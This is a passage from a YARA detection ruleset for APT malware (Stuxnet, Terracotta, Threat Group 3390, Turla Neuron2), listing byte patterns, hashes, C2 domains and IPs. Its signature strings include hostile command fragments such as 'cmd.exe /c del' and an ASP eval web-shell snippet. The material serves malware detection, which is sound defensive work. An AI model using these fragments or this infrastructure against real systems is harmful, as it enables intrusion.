Blacklist: strings */ $s8 = "Unsupported OS (%s)" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 300KB and (2 of ($x*) or all of ($s*)) } rule Sphinx_Moth_kerberos64 { meta: description = "sphinx moth threat group file kerberos64.dll" author = "Kudelski Security - Nagravision SA (modified by Florian Roth)" reference = "www.kudelskisecurity.com" date = "2015-08-06" strings: $s0 = "KERBEROS64.dll" fullword ascii $s1 = "zeSecurityDescriptor" fullword ascii $s2 = "SpGetInfo" fullword ascii $s3 = "SpShutdown" fullword ascii $op0 = { 75 05 e8 6a c7 ff ff 48 8b 1d 47 d6 00 00 33 ff } /* Opcode */ $op1 = { 48 89 05 0c 2b 01 00 c7 05 e2 29 01 00 09 04 00 } /* Opcode */ $op2 = { 48 8d 3d e3 ee 00 00 ba 58 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 406KB and all of ($s*) and 1 of ($op*) } rule Sphinx_Moth_nvcplex { meta: description = "sphinx moth threat group file nvcplex.dat" author = "Kudelski Security - Nagravision SA" reference = "www.kudelskisecurity.com" date = "2015-08-06" strings: $s0 = "mshtaex.exe" fullword wide $op0 = { 41 8b cc 44 89 6c 24 28 48 89 7c 24 20 ff 15 d3 } /* Opcode */ $op1 = { 48 3b 0d ad 8f 00 00 74 05 e8 ba f5 ff ff 48 8b } /* Opcode */ $op2 = { 8b ce e8 49 47 00 00 90 8b 43 04 89 05 93 f1 00 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 214KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule StuxNet_Malware_1 { meta: description = "Stuxnet Sample - file malware.exe" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "9c891edb5da763398969b6aaa86a5d46971bd28a455b20c2067cb512c9f9a0f8" strings: // 0x10001778 8b 45 08 mov eax, dword ptr [ebp + 8] // 0x1000177b 35 dd 79 19 ae xor eax, 0xae1979dd // 0x10001780 33 c9 xor ecx, ecx // 0x10001782 8b 55 08 mov edx, dword ptr [ebp + 8] // 0x10001785 89 02 mov dword ptr [edx], eax // 0x10001787 89 ?? ?? mov dword ptr [edx + 4], ecx $op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 } // 0x10002045 74 36 je 0x1000207d // 0x10002047 8b 7f 08 mov edi, dword ptr [edi + 8] // 0x1000204a 83 ff 00 cmp edi, 0 // 0x1000204d 74 2e je 0x1000207d // 0x1000204f 0f b7 1f movzx ebx, word ptr [edi] // 0x10002052 8b 7f 04 mov edi, dword ptr [edi + 4] $op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 } // 0x100020cf 74 70 je 0x10002141 // 0x100020d1 81 78 05 8d 54 24 04 cmp dword ptr [eax + 5], 0x424548d // 0x100020d8 75 1b jne 0x100020f5 // 0x100020da 81 78 08 04 cd ?? ?? cmp dword ptr [eax + 8], 0xc22ecd04 $op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd } condition: all of them } rule Stuxnet_Malware_2 { meta: description = "Stuxnet Sample - file 63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802" strings: $s1 = "\\SystemRoot\\System32\\hal.dll" fullword wide $s2 = "http://www.jmicron.co.tw0" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 70KB and all of them } rule StuxNet_dll { meta: description = "Stuxnet Sample - file dll.dll" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "9e392277f62206098cf794ddebafd2817483cfd57ec03c2e05e7c3c81e72f562" strings: $s1 = "SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and $s1 } rule Stuxnet_Shortcut_to { meta: description = "Stuxnet Sample - file Copy of Shortcut to.lnk" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "801e3b6d84862163a735502f93b9663be53ccbdd7f12b0707336fecba3a829a2" strings: $x1 = "\\\\.\\STORAGE#Volume#_??_USBSTOR#Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_PMAP#5B6B098B97BE&0#{53f56307-b6bf-11d0-94f2-00a0c" wide condition: uint16(0) == 0x004c and filesize < 10KB and $x1 } rule Stuxnet_Malware_3 { meta: description = "Stuxnet Sample - file ~WTR4141.tmp" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "6bcf88251c876ef00b2f32cf97456a3e306c2a263d487b0a50216c6e3cc07c6a" hash2 = "70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b" strings: $x1 = "SHELL32.DLL.ASLR." fullword wide $s1 = "~WTR4141.tmp" fullword wide $s2 = "~WTR4132.tmp" fullword wide $s3 = "totalcmd.exe" fullword wide $s4 = "wincmd.exe" fullword wide $s5 = "http://www.realtek.com0" fullword ascii $s6 = "{%08x-%08x-%08x-%08x}" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 150KB and ( $x1 or 3 of ($s*) ) ) or ( 5 of them ) } rule Stuxnet_Malware_4 { meta: description = "Stuxnet Sample - file 0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198" hash2 = "1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c" strings: $x1 = "\\objfre_w2k_x86\\i386\\guava.pdb" ascii $x2 = "MRxCls.sys" fullword wide $x3 = "MRXNET.Sys" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 80KB and 1 of them ) or ( all of them ) } rule Stuxnet_maindll_decrypted_unpacked { meta: description = "Stuxnet Sample - file maindll.decrypted.unpacked.dll_" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "4c3d7b38339d7b8adf73eaf85f0eb9fab4420585c6ab6950ebd360428af11712" strings: $s1 = "%SystemRoot%\\system32\\Drivers\\mrxsmb.sys;%SystemRoot%\\system32\\Drivers\\*.sys" fullword wide $s2 = "<Actions Context=\"%s\"><Exec><Command>%s</Command><Arguments>%s,#%u</Arguments></Exec></Actions>" fullword wide $s3 = "%SystemRoot%\\inf\\oem7A.PNF" fullword wide $s4 = "%SystemRoot%\\inf\\mdmcpq3.PNF" fullword wide $s5 = "%SystemRoot%\\inf\\oem6C.PNF" fullword wide $s6 = "@abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @" wide $s7 = "STORAGE#Volume#1&19f7e59c&0&" fullword wide $s8 = "view MCPVREADVARPERCON as select VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPARAMETER,PROTOKOLL,MAXLIMI" ascii condition: 6 of them } rule Stuxnet_s7hkimdb { meta: description = "Stuxnet Sample - file s7hkimdb.dll" author = "Florian Roth" reference = "Internal Research" date = "2016-07-09" hash1 = "4071ec265a44d1f0d42ff92b2fa0b30aafa7f6bb2160ed1d0d5372d70ac654bd" strings: $x1 = "S7HKIMDX.DLL" fullword wide /* Opcodes by Binar.ly */ // 0x10001778 8b 45 08 mov eax, dword ptr [ebp + 8] // 0x1000177b 35 dd 79 19 ae xor eax, 0xae1979dd // 0x10001780 33 c9 xor ecx, ecx // 0x10001782 8b 55 08 mov edx, dword ptr [ebp + 8] // 0x10001785 89 02 mov dword ptr [edx], eax // 0x10001787 89 ?? ?? mov dword ptr [edx + 4], ecx $op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 } // 0x10002045 74 36 je 0x1000207d // 0x10002047 8b 7f 08 mov edi, dword ptr [edi + 8] // 0x1000204a 83 ff 00 cmp edi, 0 // 0x1000204d 74 2e je 0x1000207d // 0x1000204f 0f b7 1f movzx ebx, word ptr [edi] // 0x10002052 8b 7f 04 mov edi, dword ptr [edi + 4] $op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 } // 0x100020cf 74 70 je 0x10002141 // 0x100020d1 81 78 05 8d 54 24 04 cmp dword ptr [eax + 5], 0x424548d // 0x100020d8 75 1b jne 0x100020f5 // 0x100020da 81 78 08 04 cd ?? ?? cmp dword ptr [eax + 8], 0xc22ecd04 $op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd } condition: ( uint16(0) == 0x5a4d and filesize < 40KB and $x1 and all of ($op*) ) } rule Stuxnet_MadeInPython { meta: description = "Python has been used frequently by threat actors for compiling executable file with source code. I found python Stuxnet source code that can be executed with required dependencies. This rule is created in hopes to catch potental breakout of future Stuxnet." author = "Jin Kim" reference = "https://github.com/kenmueller/stuxnet" date = "2020-12-23" strings: // main function include this call stack as a second function call. $str1 = "old_infected_attributes = node_infected_attributes(graph)" // def node_total_attributes(graph: nx.Graph) -> dict: // filter_for_node_type = lambda node_type: list(filter(lambda node: get_node_type(graph, node) == node_type, graph.node)) // return { // NodeType.COMPUTER: len(filter_for_node_type(NodeType.COMPUTER)), // NodeType.DISCONNECTED_COMPUTER: len(filter_for_node_type(NodeType.DISCONNECTED_COMPUTER)), // NodeType.USB: len(filter_for_node_type(NodeType.USB)), // NodeType.PLC: len(filter_for_node_type(NodeType.PLC)), // 'total': len(graph.node) $str2 = "NodeType.DISCONNECTED_COMPUTER" // found in create-graph.py // This line adds router nodes and computer nodes fro all the wireless networks. // for router_node in range(NUMBER_OF_LOCAL_WIRED_NETWORKS, NUMBER_OF_LOCAL_NETWORKS): // add_computer_nodes(graph, EdgeType.LOCAL_WIRELESS, router_node) $str3 = "add_computer_nodes(graph, EdgeType.LOCAL_WIRELESS, router_node)" condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Rule Set ----------------------------------------------------------------- */ /* Yara Rule Set Author: Florian Roth Date: 2015-08-04 Identifier: Terracotta APT Comment: Reduced Rule Set */ rule Apolmy_Privesc_Trojan { meta: description = "Apolmy Privilege Escalation Trojan used in APT Terracotta" author = "Florian Roth" reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/" date = "2015-08-04" score = 80 hash = "d7bd289e6cee228eb46a1be1fcdc3a2bd5251bc1eafb59f8111756777d8f373d" strings: $s1 = "[%d] Failed, %08X" fullword ascii $s2 = "[%d] Offset can not fetched." fullword ascii $s3 = "PowerShadow2011" fullword wide condition: uint16(0) == 0x5a4d and filesize < 300KB and all of them } rule Mithozhan_Trojan { meta: description = "Mitozhan Trojan used in APT Terracotta" author = "Florian Roth" reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/" date = "2015-08-04" score = 70 hash = "8553b945e2d4b9f45c438797d6b5e73cfe2899af1f9fd87593af4fd7fb51794a" strings: $s1 = "adbrowser" fullword wide $s2 = "IJKLlGdmaWhram0vn36BgIOChYR3L45xcHNydXQvhmloa2ptbH8voYCDTw==" fullword ascii $s3 = "EFGHlGdmaWhrL41sf36BgIOCL6R3dk8=" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 300KB and all of them } rule RemoteExec_Tool { meta: description = "Remote Access Tool used in APT Terracotta" author = "Florian Roth" reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/" date = "2015-08-04" hash = "a550131e106ff3c703666f15d55d9bc8c816d1cb9ac1b73c2e29f8aa01e53b78" strings: $s0 = "cmd.exe /q /c \"%s\"" fullword ascii $s1 = "\\\\.\\pipe\\%s%s%d" fullword ascii $s2 = "This is a service executable! Couldn't start directly." fullword ascii $s3 = "\\\\.\\pipe\\TermHlp_communicaton" fullword ascii $s4 = "TermHlp_stdout" fullword ascii $s5 = "TermHlp_stdin" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 75KB and 4 of ($s*) } /* Super Rules ------------------------------------------------------------- */ rule LiuDoor_Malware_1 { meta: description = "Liudoor Trojan used in Terracotta APT" author = "Florian Roth" reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/" date = "2015-08-04" score = 70 super_rule = 1 hash1 = "deed6e2a31349253143d4069613905e1dfc3ad4589f6987388de13e33ac187fc" hash2 = "4575e7fc8f156d1d499aab5064a4832953cd43795574b4c7b9165cdc92993ce5" hash3 = "ad1a507709c75fe93708ce9ca1227c5fefa812997ed9104ff9adfec62a3ec2bb" strings: $s1 = "svchostdllserver.dll" fullword ascii $s2 = "SvcHostDLL: RegisterServiceCtrlHandler %S failed" fullword ascii $s3 = "\\nbtstat.exe" fullword ascii $s4 = "DataVersionEx" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 150KB and all of them } rule LiuDoor_Malware_2 { meta: description = "Liudoor Trojan used in Terracotta APT" author = "Florian Roth" reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/" date = "2015-08-04" score = 70 super_rule = 1 hash1 = "f3fb68b21490ded2ae7327271d3412fbbf9d705c8003a195a705c47c98b43800" hash2 = "e42b8385e1aecd89a94a740a2c7cd5ef157b091fabd52cd6f86e47534ca2863e" strings: $s0 = "svchostdllserver.dll" fullword ascii $s1 = "Lpykh~mzCCRv|mplpykCCHvq{phlCC\\jmmzqkIzmlvpqCC" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule liudoor { meta: author = "RSA FirstWatch" date = "2015-07-23" description = "Detects Liudoor daemon backdoor" hash0 = "78b56bc3edbee3a425c96738760ee406" hash1 = "5aa0510f6f1b0e48f0303b9a4bfc641e" hash2 = "531d30c8ee27d62e6fbe855299d0e7de" hash3 = "2be2ac65fd97ccc97027184f0310f2f3" hash4 = "6093505c7f7ec25b1934d3657649ef07" type = "Win32 DLL" strings: $string0 = "Succ" $string1 = "Fail" $string2 = "pass" $string3 = "exit" $string4 = "svchostdllserver.dll" $string5 = "L$,PQR" $string6 = "0/0B0H0Q0W0k0" $string7 = "QSUVWh" $string8 = "Ht Hu[" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2015-08-06 Identifier: Threat Group 3390 */ rule HttpBrowser_RAT_dropper_Gen1 { meta: description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 70 hash1 = "808de72f1eae29e3c1b2c32be1b84c5064865a235866edf5e790d2a7ba709907" hash2 = "f6f966d605c5e79de462a65df437ddfca0ad4eb5faba94fc875aba51a4b894a7" hash3 = "f424965a35477d822bbadb821125995616dc980d3d4f94a68c87d0cd9b291df9" hash4 = "01441546fbd20487cb2525a0e34e635eff2abe5c3afc131c7182113220f02753" hash5 = "8cd8159f6e4689f572e2087394452e80e62297af02ca55fe221fe5d7570ad47b" hash6 = "10de38419c9a02b80ab7bf2f1f1f15f57dbb0fbc9df14b9171dc93879c5a0c53" hash7 = "c2fa67e970d00279cec341f71577953d49e10fe497dae4f298c2e9abdd3a48cc" strings: $x1 = "1001=cmd.exe" fullword ascii $x2 = "1003=ShellExecuteA" fullword ascii $x3 = "1002=/c del /q %s" fullword ascii $x4 = "1004=SetThreadPriority" fullword ascii /* $s1 = "pnipcn.dllUT" fullword ascii $s2 = "ssonsvr.exeUT" fullword ascii $s3 = "navlu.dllUT" fullword ascii $s4 = "@CONOUT$" fullword wide $s5 = "VPDN_LU.exeUT" fullword ascii $s6 = "msi.dll.urlUT" fullword ascii $s7 = "setup.exeUT" fullword ascii $s8 = "pnipcn.dll.urlUT" fullword ascii $s9 = "ldvpreg.exeUT" fullword ascii */ $op0 = { e8 71 11 00 00 83 c4 10 ff 4d e4 8b f0 78 07 8b } /* Opcode */ $op1 = { e8 85 34 00 00 59 59 8b 86 b4 } /* Opcode */ $op2 = { 8b 45 0c 83 38 00 0f 84 97 } /* Opcode */ $op3 = { 8b 45 0c 83 38 00 0f 84 98 } /* Opcode */ $op4 = { 89 7e 0c ff 15 a0 50 40 00 59 8b d8 6a 20 59 8d } /* Opcode */ $op5 = { 56 8d 85 cd fc ff ff 53 50 88 9d cc fc ff ff e8 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 400KB and all of ($x*) and 1 of ($op*) } rule HttpBrowser_RAT_Sample1 { meta: description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 80 hash1 = "be334d1f8fa65a723af65200a166c2bbdb06690c8b30fafe772600e4662fc68b" hash2 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb" strings: $s0 = "update.hancominc.com" fullword wide condition: uint16(0) == 0x5a4d and filesize < 100KB and $s0 } rule HttpBrowser_RAT_Sample2 { meta: description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 80 hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992" strings: $s0 = "nKERNEL32.DLL" fullword wide $s1 = "WUSER32.DLL" fullword wide $s2 = "mscoree.dll" fullword wide $s3 = "VPDN_LU.exeUT" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 250KB and all of them } rule HttpBrowser_RAT_Gen { meta: description = "Threat Group 3390 APT Sample - HttpBrowser RAT Generic" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 90 hash1 = "0299493ccb175d452866f5e21d023d3e92cd8d28452517d1d19c0f05f2c5ca27" hash2 = "065d055a90da59b4bdc88b97e537d6489602cb5dc894c5c16aff94d05c09abc7" hash3 = "05c7291db880f94c675eea336ecd66338bd0b1d49ad239cc17f9df08106e6684" hash4 = "07133f291fe022cd14346cd1f0a649aa2704ec9ccadfab809ca9c48b91a7d81b" hash5 = "0f8893e87ddec3d98e39a57f7cd530c28e36d596ea0a1d9d1e993dc2cae0a64d" hash6 = "108e6633744da6efe773eb78bd0ac804920add81c3dde4b26e953056ac1b26c5" hash7 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb" hash8 = "1277ede988438d4168bb5b135135dd3b9ae7d9badcdf1421132ca4692dd18386" hash9 = "19be90c152f7a174835fd05a0b6f722e29c648969579ed7587ae036679e66a7b" hash10 = "1e7133bf5a9fe5e462321aafc2b7770b8e4183a66c7fef14364a0c3f698a29af" hash11 = "2264e5e8fcbdcb29027798b200939ecd8d1d3ad1ef0aef2b8ce7687103a3c113" hash12 = "2a1bdeb0a021fb0bdbb328bd4b65167d1f954c871fc33359cb5ea472bad6e13e" hash13 = "259a2e0508832d0cf3f4f5d9e9e1adde17102d2804541a9587a9a4b6f6f86669" hash14 = "240d9ce148091e72d8f501dbfbc7963997d5c2e881b4da59a62975ddcbb77ca2" hash15 = "211a1b195cf2cc70a2caf8f1aafb8426eb0e4bae955e85266490b12b5322aa16" hash16 = "2d25c6868c16085c77c58829d538b8f3dbec67485f79a059f24e0dce1e804438" hash17 = "2d932d764dd9b91166361d8c023d64a4480b5b587a6087b0ce3d2ac92ead8a7d" hash18 = "3556722d9aa37beadfa6ba248a66576f767e04b09b239d3fb0479fa93e0ba3fd" hash19 = "365e1d4180e93d7b87ba28ce4369312cbae191151ac23ff4a35f45440cb9be48" hash20 = "36c49f18ce3c205152eef82887eb3070e9b111d35a42b534b2fb2ee535b543c0" hash21 = "3eeb1fd1f0d8ab33f34183893c7346ddbbf3c19b94ba3602d377fa2e84aaad81" hash22 = "3fa8d13b337671323e7fe8b882763ec29b6786c528fa37da773d95a057a69d9a" strings: $s0 = "%d|%s|%04d/%02d/%02d %02d:%02d:%02d|%ld|%d" fullword wide $s1 = "HttpBrowser/1.0" fullword wide $s2 = "set cmd : %s" ascii fullword $s3 = "\\config.ini" wide fullword condition: uint16(0) == 0x5a4d and filesize < 45KB and filesize > 20KB and all of them } rule PlugX_NvSmartMax_Gen { meta: description = "Threat Group 3390 APT Sample - PlugX NvSmartMax Generic" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 70 hash1 = "718fc72942b9b706488575c0296017971170463f6f40fa19b08fc84b79bf0cef" hash2 = "1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0" hash3 = "555952aa5bcca4fa5ad5a7269fece99b1a04816d104ecd8aefabaa1435f65fa5" hash4 = "71f7a9da99b5e3c9520bc2cc73e520598d469be6539b3c243fb435fe02e44338" hash5 = "65bbf0bd8c6e1ccdb60cf646d7084e1452cb111d97d21d6e8117b1944f3dc71e" strings: $s0 = "NvSmartMax.dll" fullword ascii $s1 = "NvSmartMax.dll.url" fullword ascii $s2 = "Nv.exe" fullword ascii $s4 = "CryptProtectMemory failed" fullword ascii $s5 = "CryptUnprotectMemory failed" fullword ascii $s7 = "r%.*s(%d)%s" fullword wide $s8 = " %s CRC " fullword wide $op0 = { c6 05 26 49 42 00 01 eb 4a 8d 85 00 f8 ff ff 50 } /* Opcode */ $op1 = { 8d 85 c8 fe ff ff 50 8d 45 c8 50 c6 45 47 00 e8 } /* Opcode */ $op2 = { e8 e6 65 00 00 50 68 10 43 41 00 e8 56 84 00 00 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 800KB and all of ($s*) and 1 of ($op*) } rule HttpBrowser_RAT_dropper_Gen2 { meta: description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 70 hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992" hash2 = "dfa984174268a9f364d856fd47cfaca75804640f849624d69d81fcaca2b57166" strings: $s1 = "navlu.dll.urlUT" fullword ascii $s2 = "VPDN_LU.exeUT" fullword ascii $s3 = "pnipcn.dllUT" fullword ascii $s4 = "\\ssonsvr.exe" fullword ascii $s5 = "/c del /q %s" fullword ascii $s6 = "\\setup.exe" fullword ascii $s7 = "msi.dllUT" fullword ascii $op0 = { 8b 45 0c 83 38 00 0f 84 98 } /* Opcode */ $op1 = { e8 dd 07 00 00 ff 35 d8 fb 40 00 8b 35 7c a0 40 } /* Opcode */ $op2 = { 83 fb 08 75 2c 8b 0d f8 af 40 00 89 4d dc 8b 0d } /* Opcode */ $op3 = { c7 43 18 8c 69 40 00 e9 da 01 00 00 83 7d f0 00 } /* Opcode */ $op4 = { 6a 01 e9 7c f8 ff ff bf 1a 40 00 96 1b 40 00 01 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 400KB and 3 of ($s*) and 1 of ($op*) } rule ThreatGroup3390_Strings { meta: description = "Threat Group 3390 APT - Strings" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 60 strings: $s1 = "\"cmd\" /c cd /d \"c:\\Windows\\Temp\\\"&copy" ascii $s2 = "svchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014" $s3 = "ren *.rar *.zip" fullword ascii $s4 = "c:\\temp\\ipcan.exe" fullword ascii $s5 = "<%eval(Request.Item(\"admin-na-google123!@#" ascii condition: 1 of them and filesize < 30KB } rule ThreatGroup3390_C2 { meta: description = "Threat Group 3390 APT - C2 Server" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 60 strings: $s1 = "api.apigmail.com" $s2 = "apigmail.com" $s3 = "backup.darkhero.org" $s4 = "bel.updatawindows.com" $s5 = "binary.update-onlines.org" $s6 = "blackcmd.com" $s7 = "castle.blackcmd.com" $s8 = "ctcb.blackcmd.com" $s9 = "darkhero.org" $s10 = "dav.local-test.com" $s11 = "test.local-test.com" $s12 = "dev.local-test.com" $s13 = "ocean.local-test.com" $s14 = "ga.blackcmd.com" $s15 = "helpdesk.blackcmd.com" $s16 = "helpdesk.csc-na.com" $s17 = "helpdesk.hotmail-onlines.com" $s18 = "helpdesk.lnip.org" $s19 = "hotmail-onlines.com" $s20 = "jobs.hotmail-onlines.com" $s21 = "justufogame.com" $s22 = "lnip.org" $s23 = "local-test.com" $s24 = "login.hansoftupdate.com" $s25 = "long.update-onlines.org" $s26 = "longlong.update-onlines.org" $s27 = "longshadow.dyndns.org" $s28 = "longshadow.update-onlines.org" $s29 = "longykcai.update-onlines.org" $s30 = "lostself.update-onlines.org" $s31 = "mac.navydocument.com" $s32 = "mail.csc-na.com" $s33 = "mantech.updatawindows.com" $s34 = "micr0soft.org" $s35 = "microsoft-outlook.org" $s36 = "mtc.navydocument.com" $s37 = "navydocument.com" $s38 = "mtc.update-onlines.org" $s39 = "news.hotmail-onlines.com" $s40 = "oac.3322.org" $s41 = "ocean.apigmail.com" $s42 = "pchomeserver.com" $s43 = "registre.organiccrap.com" $s44 = "security.pomsys.org" $s45 = "services.darkhero.org" $s46 = "sgl.updatawindows.com" $s47 = "shadow.update-onlines.org" $s48 = "sonoco.blackcmd.com" $s49 = "test.logmastre.com" $s50 = "up.gtalklite.com" $s51 = "updatawindows.com" $s52 = "update-onlines.org" $s53 = "update.deepsoftupdate.com" $s54 = "update.hancominc.com" $s55 = "update.micr0soft.org" $s56 = "update.pchomeserver.com" $s57 = "urs.blackcmd.com" $s58 = "wang.darkhero.org" $s59 = "webs.local-test.com" $s60 = "word.apigmail.com" $s61 = "wordpress.blackcmd.com" $s62 = "working.blackcmd.com" $s63 = "working.darkhero.org" $s64 = "working.hotmail-onlines.com" $s65 = "www.trendmicro-update.org" $s66 = "www.update-onlines.org" $s67 = "x.apigmail.com" $s68 = "ykcai.update-onlines.org" $s69 = "ykcailostself.dyndns-free.com" $s70 = "ykcainobody.dyndns.org" $s71 = "zj.blackcmd.com" $s72 = "laxness-lab.com" $s73 = "google-ana1ytics.com" $s74 = "www.google-ana1ytics.com" $s75 = "ftp.google-ana1ytics.com" $s76 = "hotmailcontact.net" $s77 = "208.115.242.36" $s78 = "208.115.242.37" $s79 = "208.115.242.38" $s80 = "66.63.178.142" $s81 = "72.11.148.220" $s82 = "72.11.141.133" $s83 = "74.63.195.236" $s84 = "74.63.195.236" $s85 = "74.63.195.237" $s86 = "74.63.195.238" $s87 = "103.24.0.142" $s88 = "103.24.1.54" $s89 = "106.187.45.162" $s90 = "192.151.236.138" $s91 = "192.161.61.19" $s92 = "192.161.61.20" $s93 = "192.161.61.22" $s94 = "103.24.1.54" $s95 = "67.215.232.179" $s96 = "96.44.177.195" $s97 = "49.143.192.221" $s98 = "67.215.232.181" $s99 = "67.215.232.182" $s100 = "96.44.182.243" $s101 = "96.44.182.245" $s102 = "96.44.182.246" $s103 = "49.143.205.30" $s104 = "working_success@163.com" $s105 = "ykcaihyl@163.com" $s106 = "working_success@163.com" $s107 = "yuming@yinsibaohu.aliyun.com" condition: uint16(0) == 0x5a4d and 1 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule apt_all_JavaScript_ScanboxFramework_obfuscated { meta: ref = "https://www.fidelissecurity.com/TradeSecret" strings: $sa1 = /(var|new|return)\s[_\$]+\s?/ $sa2 = "function" $sa3 = "toString" $sa4 = "toUpperCase" $sa5 = "arguments.length" $sa6 = "return" $sa7 = "while" $sa8 = "unescape(" $sa9 = "365*10*24*60*60*1000" $sa10 = ">> 2" $sa11 = "& 3) << 4" $sa12 = "& 15) << 2" $sa13 = ">> 6) | 192" $sa14 = "& 63) | 128" $sa15 = ">> 12) | 224" condition: all of them } rule MW_neuron2_loader_strings : Turla APT loader { meta: description = "Rule for detection of Neuron2 based on strings within the loader" author = "NCSC" family = "Turla" reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware" date = "2018-01-18" hash1 = "51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927" strings: $ = "dcom_api" ascii $ = "http://*:80/OWA/OAB/" ascii $ = "https://*:443/OWA/OAB/" ascii $ = "dcomnetsrv.cpp" wide $ = "dcomnet.dll" ascii $ = "D:\\Develop\\sps\\neuron2\\x64\\Release\\dcomnet.pdb" ascii condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 2 of them } rule MW_neuron2_decryption_routine : Turla APT { meta: description = "Rule for detection of Neuron2 based on the routine used to decrypt the payload" author = "NCSC" family = "Turla" reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware" date = "2018-01-18" hash1 = "51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927" strings: $ = {81 FA FF 00 00 00 0F B6 C2 0F 46 C2 0F B6 0C 04 48 03 CF 0F B6 D1 8A 0C 14 8D 50 01 43 32 0C 13 41 88 0A 49 FF C2 49 83 E9 01} condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them } rule MW_neuron2_dotnet_strings : Turla APT { meta: description = "Rule for detection of the .NET payload for Neuron2 based on strings used" author = "NCSC" family = "Turla" reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware" date = "2018-01-18" hash1 = "83d8922e7a8212f1a2a9015973e668d7999b90e7000c31f57be83803747df015" strings: $dotnetMagic = "BSJB" ascii $s1 = 